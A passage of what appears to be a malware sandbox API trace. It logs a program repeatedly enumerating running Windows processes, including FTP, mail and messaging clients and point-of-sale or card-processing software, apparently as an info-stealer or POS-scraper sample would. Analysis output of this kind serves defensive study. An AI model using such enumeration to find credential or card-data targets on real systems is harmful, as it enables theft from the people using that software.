lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0274.853] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0274.854] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0274.858] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0274.860] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0274.862] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0274.863] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0274.865] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0274.866] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0274.868] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0274.869] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0274.871] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0274.875] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0274.876] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0274.878] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0274.879] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0274.881] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0274.882] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0274.884] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0274.886] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0275.061] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0275.063] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0275.064] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0275.066] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0275.068] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0275.070] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0275.071] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0275.073] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0275.078] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0275.080] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0275.082] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0275.084] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0275.087] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0275.089] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0275.092] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0275.095] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0275.097] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0275.099] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0275.102] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0275.104] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0275.113] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0275.116] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0275.118] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0275.120] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0275.122] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0275.125] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0275.127] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0275.129] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0275.131] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0275.133] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0275.135] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0275.148] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0275.150] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0275.152] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0275.154] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0275.156] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0275.158] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0275.160] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0275.162] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0275.164] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0275.166] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0275.228] CloseHandle (hObject=0x9e0) returned 1 [0275.228] Sleep (dwMilliseconds=0x64) [0275.344] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0275.353] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.355] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0275.359] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0275.361] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0275.362] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0275.363] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0275.365] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0275.366] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0275.368] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0275.369] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.370] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.375] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0275.376] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.377] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.379] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.380] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.382] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.383] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.385] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.386] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0275.437] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0275.439] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, 